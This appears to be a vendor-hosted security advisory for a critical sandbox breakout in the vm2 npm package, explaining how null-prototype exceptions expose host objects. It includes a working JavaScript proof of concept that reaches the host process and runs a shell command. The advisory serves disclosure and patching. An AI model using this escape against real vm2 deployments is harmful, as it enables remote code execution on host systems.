Launch Week Day 1: Announcing Security Design Review
Start for Free
CRITICAL 9.8 npm

vm2 has Sandbox Breakout Through Null Proto Exception

GHSA-9vg3-4rfj-wgcm · CVE-2026-44009

Published · Modified

Description

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.

PoC

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
	throw o;
} catch (e) {
	e.f = Buffer.prototype.inspect
	o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes